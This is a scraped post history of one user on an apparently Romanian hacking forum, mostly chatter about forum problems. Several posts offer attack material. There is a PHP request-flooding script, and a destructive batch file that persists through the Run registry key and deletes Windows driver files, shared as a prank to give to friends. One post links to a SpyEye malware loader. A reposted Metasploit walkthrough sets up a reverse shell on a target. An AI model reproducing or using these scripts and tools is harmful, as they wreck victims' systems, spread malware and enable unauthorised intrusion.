Jump to content

HellScream

Active Members
  • Posts

    375
  • Joined

  • Days Won

    6

Everything posted by HellScream

  1. eu l-am gasit pe onion. L-am luat de acolo, si isi face treaba.
  2. alt idiot care s-a crezut in filme.
  3. stiam ca e ilegala faza asta
  4. Dupa cum unii din voi ati aflat...curiozitatea NU omoara pisici. In consecinta, va invit sa aruncati ochii pe cateva carti culese de pe net. Aceste carti, in opinia mea, ar cam trebui citite de o buna parte din membri acesteti comunitati. Titlurile sunt urmatoarele: Cryptography - Cloning and Cryptography with Quantum Continuous Variables Cryptography - Coding and Cryptography Cryptography - Cryptography And Data Security Cryptography - Number Theory An Related Alghoritm In Cryptography Cryptography - Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems Firewall Policies And VPN Configurations (2006) Hacking RSS And Atom (2005) Hacking The Cable Modem (2006) Desi sunt cam vechi....prezinta principii generale, dar si studii de caz (unele din ele). Sper sa va foloseasca (macar la aia care chiar fac ceva) http://localhostr.com/file/11BVMdm/Free%20Candys.rar Astept pareri.
  5. E vechi, e "butucanos", dar face treaba. <?php $link = $_GET['link']; //to be attacked. $times = $_GET['times']; // how many times to connect while($times > 0){ sleep(30); $ch = curl_init($link); curl_setopt($ch, CURLOPT_NOBODY, 1); //Important. Changes to a head request, don't have to wait and listen for reply. curl_exec($ch); curl_close($ch); } ?> Dovada ca inca functioneaza
  6. eventaul ip poti face tu /* * changemac.c - (C) 2011 by hellscream */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> int main() { // Forloop variable unsigned short int i=0; // To get milliseconds struct timeval t; // Temporary random number unsigned short int ran=0; // Get time gettimeofday(&t, NULL); // Init random number generator srand(t.tv_usec); // Print random mac address for(i=0; i<6; i++) { ran = 0+rand()%256; if(ran <= 9) (i<5) ? printf("0%X:", ran) : printf("0%X", ran); else (i<5) ? printf("%X:", ran) : printf("%X", ran); } // all good return 0; }
  7. nu cred.....dar ramane de vazut. Oricum, eram putin nostalgic...si mi-am spus ca nu ar fi rau, sa readuc putin la viata vechile metode de futu sisteme si nervi. Cel putin cel de al doile, iti fute nervii rau, mai ales daca stii sa il bagi in autorun.
  8. How tough is it to really compromise a system? As an ethical hacking instructor, that is a question that I get asked quite frequently. My usual response to this type of question is to encourage the questioner to try to compromise a system, which they own, to find out the time and skill necessary to compromise a system. There is real value in getting a true sense of what it really takes to actually defeat common security measures. This provides first hand experience that cannot really be duplicated from listening to an industry expert or from reading articles and books. The main reason for this is that there is a lot of misinformation, some intentional and some not, available. The easiest way to determine just how difficult something like compromising systems or defeating wireless encryption is – is to try it for yourself. Most security professionals are aware attacking and penetrating network devices is getting easier and attack sophistication is getting more complex. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers have uncovered the security weakness is common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to be able to perform more complex attacks than ever though possible. For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing penetration system penetration. Products like Core Security's Core Impact and Immunity's Canvas products (See post: Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology, but they also provide training and support of their products to allow a qualified professional to perform a more methodological penetration test. It makes the task of compromising a system easier for a security administrator. The previously mentioned utilities are both fee based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including perl, C, and assembler. This environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate the system using this specific utility. The basic format for exploiting the system is as follows: 1. Pick which exploit to use 2. Configure the exploit with remote IP address and remote port number 3. Pick a payload 4. Configure the payload with local IP address and local port number 5. Execute the exploit While this process is much more difficult to do than just a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor. Many experts believe that understanding how to compromise a system is knowledge that should not be shared and utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it can not be argued that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system – the hole is in the fact that the underlying vulnerability exists in the first place. It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers this and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application and this may stop the vulnerability from ever being published in the first place. I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above. So that if someone ever mentions the difficulty involved in compromising a system you will know exactly what it really takes. [h=4]Example of Using Metasploit™[/h]The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable. To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type: cd /KNOPPIX/pentest/exploits/framework-2.3/ Launch the Metasploit™ console. To do this, from a command line type the following: # " ./msfconsole " [h=4]Pick which exploit to use[/h]Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands: <!--[if !supportLists]-->use <!--[if !supportLists]-->show <!--[if !supportLists]--><!--[endif]-->info The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module. Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course. If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit. To actually start the exploit type "use iis50_webdav_ntdll" [h=4]After use – configure options[/h]We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options. Start by typing "show options" This will show you the command requirements to run the exploit. These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on) To set these options type "set RHOST <your partner machines IP address>" and press enter. On the next line type "set RPORT 80" [h=4]Is the exploit going to work?[/h]We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out. To perform the check type "check ". This may not work on all exploits. This will see if the server or target appears vulnerable. For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target. If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below. msf iis50_webdav_ntdll > show targets Supported Exploit Targets ========================= 0 Windows 2000 Bruteforce [h=4]What do we want a successful attack to do?[/h]What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below . msf iis50_webdav_ntdll > show payloads Metasploit™ Framework Usable Payloads ==================================== win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_exec Windows Execute Command win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse" This payload requires some options. These include the exit function, the local host and the local port. To see these options type "show options" you should see something like the below: msf iis50_webdav_ntdll(win32_reverse) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ----------- ------------------ optional SSL Use SSL required RHOST 67.36.70.19 The target address required RPORT 80 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC seh Exit technique: "process", "thread", "seh" required LHOST Local address to receive connection required LPORT 4321 Local port to receive connection Target: Windows 2000 Bruteforce To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear. Once you have the box open type "ifconfig". This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following: [root@localhost ~]# ifconfig eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2 inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0 inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:4563 errors:0 dropped:0 overruns:0 frame:0 TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB) Interrupt:193 Base address:0x4c00 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:213 errors:0 dropped:0 overruns:0 frame:0 TX packets:213 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB) What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise. Once we know this value we will set it with the set command. To do this type "set LHOST <your IP address>". This is all that really needs to be set, but for luck I always make one more change – I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out – be my guest and change it. This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below. msf iis50_webdav_ntdll(win32_reverse) > show advanced Exploit and Payload Options =========================== Exploit (Msf::Exploit::iis50_webdav_ntdll): ------------------------------------------- Payload (Msf::Payload::win32_reverse): -------------------------------------- [h=4]Making it all happen[/h]Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box. To do this type "exploit" Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above. If you've done everything right you should see something like the below. [*] Starting Reverse Handler. [*] Connecting to web server. OK [*] Trying return address 0x004e004f... [*] Sending request (65739 bytes) [*] Connecting to web server. OK [*] Trying return address 0x00420041... [*] Sending request (65739 bytes) [*] Connecting to web server. OK [*] Trying return address 0x00430041... [*] Sending request (65739 bytes) [*] Connecting to web server. OK [*] Trying return address 0x00c10041... [*] Sending request (65739 bytes) [*] Connecting to web server. OK [*] Trying return address 0x00c30041... [*] Sending request (65739 bytes) [*] Connecting to web server. OK [*] Trying return address 0x00c90041... [*] Sending request (65739 bytes) If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next, after all where is the fun in that. Don't trash the system too bad if you want to exploit it again. You might want to try to crack the passwords– or you can create your own netcat backdoor. Metasploit™ – available from http://www.Metasploit™.com It is not essential that the user boot a linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site. SURSA http://www.ethicalhacker.net/content/view/29/24/
  9. In seara asta vine mos nicolae, si dementul de eu, cu niste mici virusei in vechiul Ms-Dos. Este atat pt cei incepatori...cat si pt cei avansati, care nu au pofta sa isi faca ei micile "glume". Eu va dau comenzile, voi le puneti in fisier, si le dati prietenilor. Eventual cautati pe net un BAT2exe convertor...si mai departe stiti voi...... Pt a obtine un Blue Screen of Death copiati ce e mai jos. rem --------------------------------- rem HA HA Ha...ce ai ma...vezi albastru? @((( Echo Off > Nul ) & Break Off ) @Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVe rsion\Run @Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul @Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*" ) rem --------------------------------- Pt a obtine o serie de ferestre care se deschid LA INFINIT...folositi codul de mai jos :1 Msg * "Aici scrii ce mesaj vrei sa ii apara pe ecran" start calc.exe start cmd.exe start notepad.exe start regedit.exe :goto 1
  10. NETESTAT.....In sandbox trebuie sa fie ok Aveti softul.....si tutorialul. Sper sa va fie de folos. http://localhostr.com/file/QAoG9z0/SpyEye%201.3.45%20Loader.rar
  11. BEFORE YOU CONTINUE BEAR IN MIND THAT AFTER FOLLOWING STEPS IN THIS TUTORIAL ALL YOUR DNS REQUESTS WILL GO OVER TOR NETWORK, EVEN THOSE FROM APPS YOU USE TO CRUISE THE CLEARNET it will definitely slow down your net. if you have any issues with that you should think about some other solutions. before we begin i assume you're on linux os, with tor up and running. okay, let's get started. we need a dns server that is able to send dns requests over tcp. ttdnsd ( ttdnsd : The TOR TCP DNS Daemon ) does the job just fine. download latest (0.2 - july 2007) version here http://www.mulliner.org/collin/feed/ttdnsd-0.2.tar.gz . (you could install it by apt-get if you're on debianish linux distro [ubuntu, backtrack], but it probably will be installed as system's default dns server along with some conf files and startup scripts, and we don't want that) we need proxychains to make ttdnsd work. you can "apt-get install proxychains" it, or get the sources here ProxyChains - TCP and DNS through proxy server. HTTP and SOCKS ttdnsd would suffice, but it doesn't cache requests. when using tor dns response varies from few hundred ms to few secs. that's when dnsmasq comes into play. it can be used as full capable dns server, but we only need it for it's caching abilities. as with proxychains, you can either "apt-get install dnsmasq" it, or get source here Index of /dnsmasq now make sure you have proxychains working, dnsmasq up and running as deamon, and compiled ttdnsd binary in executable path (/usr/sbin will do). the idea is to have such a configuration, so that any dns request follow specific path like in this example: - some more or less inocennt app asks what the ip of "obamapc.whitehouse.gov" is - if dnsmasq doesn't know the answer (it's not cached) it asks ttdnsd - ttdnsd connects to a dns sever on the net over TOR, and gives returned ip addres to dnsmasq - dnsmasq serves ip to an app and caches it for later use we can achieve it by doing following: 1) change some options in /etc/dnsmasq.conf: - set 'resolv-file' to something like ie. "/etc/resolv.conf.dnsmasq" - set 'listen-address' to 127.0.0.1 - uncomment 'bind-interface' 2) make a new file called /etc/resolv.conf.dnsmasq [or whatever you chose in step 1] with a single line "nameserver 127.0.0.10" 3) make a new file called /etc/resolv.conf.ttdnsd and put a single line with ip address of a public dns server that serves request over tcp. "4.2.2.2" works for me, but you're free to choose your own. you can put more than one ip here. 4) put only "nameserver 127.0.0.1" in your /etc/resolv.conf 5) now test this config by - start wireshark and apply "dns" filter to watch dns traffic - restarting dnsmasq so it takes our changes into consideration - starting ttdnsd like this "proxychains ttdnsd -f /etc/resolv.conf.tor -d -b 127.0.0.10" - dig microsoft.com - dig microsoft.com again if everything went well, there should be no visible dns traffic in wireshark. first request for ip of microsoft.com should take some time to finish, as it's going through tor network. second request should be served from dnsmasq cache in few ms. let's make sure this config stays for good. first of all, dhcp clients and some network manager like to overwrite /etc/resolv.conf file with their own variations of it. make sure it doesn't happen: "chattr +i /etc/resolv.conf" should prevent any modifications. second, dnsmasq should start at boot time as a deamon, but ttdnsd doesn't. make manual startup files and make sure they're executed during boot. if you use debian-based system like me, you can make /etc/init.d/ttdnsd file containing: Code: Select all #! /bin/sh # /etc/init.d/ttdnsd case "$1" in start) echo "Starting script ttdnsd" proxychains ttdnsd -f /etc/resolv.conf.tor -d -b 127.0.0.10 ;; stop) echo "Stopping script ttdnsd" echo "killall -9 ttdnsd" ;; *) echo "Usage: /etc/init.d/ttdnsd {start|stop}" exit 1 ;; esac exit 0 and then running "update-rc.d ttdnsd defaults". if you're running some other linux distro, make sure that "proxychains ttdnsd -f /etc/resolv.conf.tor -d -b 127.0.0.10" is executed during boot. well, that's it. after reboot all your dns requests should be routed through TOR. keep an eye on wireshark log window just to be sure tough you can now comment "proxy-dns" option in /etc/proxychains.conf and run "proxychains anyapp www.whatever.com" with out it making dns requests for EVERY FREAKIN CONNECTION it makes. i've been running on this config for a while now, and haven't run into any problems. if you have some issues or problems with this tut, feel free to post them and i'll try to help. stay safe
  12. acum serios.....ce plm se intampla? 1) dispar useri (conturi) 2) cade forumul cand iti e mai drag 3) trimiti mesaje care ajung......in neant... Nu vreau sa fiu conspirativ.....dar corelarea asta e doar in mintea mea bolnava?
  13. la mine sunt.....dar doar in profil. Ideea e ca nu cred ca sunt vitale pt forum.
  14. pai daca banuiti cine e "facatorul de bine"....dc nu "dati alarma"? lasati un ip...sau o gama....si pun pariu ca fiecare va face ce poate doar ca sa il dea jos.
  15. mie mi-a dat punctele inapoi..dar tot power 1 apare
  16. Raportez---> FARA PROBLEME. L.e. dispar mesajele pivate....dar nu cred ca este un ipediment.
  17. MULTUMESC FRUMOS. Au reaparut numarul de postari, avatarul, si starile. Singurele lucruri modificate au ramas punctele de reputatie, prietenii si semnatura. Cu prietenii o rezolv, si semnatura la fel. Pt reputatie am sa mai apelez odata la tine. MULTUMESC INCA ODATA.
  18. eu zic sa mai stai putin prin zona...s vezi care e mersul...si dupa aia sa postezi din astea....ok?
  19. Nu inteleg de ce pula mea dati pm-uri daca NU indepliniti conditiile. Dau cui vreau eu, pt ca e munca mea. Ce plm, era mai bine sa cer bani? Pula mea, ia puneti si voi mana sa munciti, si sa dati mok daca va convine. Nu am pretentii ca ce am facut eu, va rasturna lumea, dar o buna parte din voi, ati dat din umeri cand a fost vorba sa va descurcati singuri. Plangeti ca tarfele pe forum, ca nu stiti sa scapati de faza....si acum faceti gat. Cei care nu indeplinesc conditiile, au 2 sanse 1) sa sparga pass----atunci chiar demonstreaza ca stiu macar baza=> merita sa aiba fisierele (au muncit pt ele) 2) sa planga pe langa cineva sa le dea si lor.
  20. o scuza care mergea mereu la mine " Am fost chemat urgent la servici. A zis seful ca daca nu ma dauc ma da afara. Examen mai dau, dar loc de munca mai greu. Imi cer scuze domnule profesor, si va rog sa nu va suparti. Era vorba de locul de munca. Decat sa vin cu scuze penibile, gen familie, sanatate, eu v-am spus adevarul. Ramane la latidudinea dvs, daca ma intelegeti sau nu." Asa ma scoateam mereu. Plm, aveam sef najpa.
  21. http://localhostr.com/download/SWk9rTL/script.rar La fel ca si la scripturi. Vip-uri, "culturisti" si pt cei cu +450 posturi (sau pe acolo..nu mia putin de 420). Pt cei care ati luat deja scripturile de la mine....parola este ACEIASI (ca sa nu mai stam sa ne jucam cu pm-uri) Dca nu intelegeti pricipuil, sau nu stiti sa implementati (automatizati)...va mai explic odata, desi nu cred sa fie probleme. astept pareri. P.S pun tot aici si scripturile pt cautat pe h5, facebook si scanare status. La fel, parola este aceiasi http://localhostr.com/file/4MxDIr8/Java personalizat.rar
  22. Am "rostuit" de proiectul care contine facilitatile de pe siteul ymland (ala la care au copii orgasm). Partea buna e ca fisierele au potential. Ofer pass la arhiva doar vip-urilor, celor din cult si celor cu peste 450 de posturi. http://localhostr.com/file/pwzzieU/Scripturi Yahoo.rar Facilitati: Login/Logout Authentification Fallback ports Login timeouts HTML/SOCKS proxy HTTP authentication Configurable Foreign chat Instant messages Conferences Chatrooms File transfer Identities Status Groups and Friends list Adding and removing friends Identities Ignore New mail update Typing notification Connection pinging Support Package Separate support package Decoding messages Encoding messages Colour fade and alt text Emoticons (smileys) Anti-Spam - Overriding styles Swing models Emote manage
  23. rezolvare (cel putin la mine a mers). Am incercat sa imi schimb singur status-ul...si cand s-a schimbat am vazut ca am primit un mesaj de la site. Am dat ignore la ala, si am reincercat sa schimb status-ul. PLA, nu mai merge. Asa ca, schimbati singuri status-ul vostru si dati ignore la userul respectiv. REPET....LA MINE A MERS
  24. . Prea tare....mult prea tare.
  25. Temele sunt ok, putin personalizate si vor fi perfecte. Problema e ca tot primesc DATA BASE ERROR. Lucrati voi la forum, sau e doar de la mine. Daca e de la mine, cum plm rezolv?
×
×
  • Create New...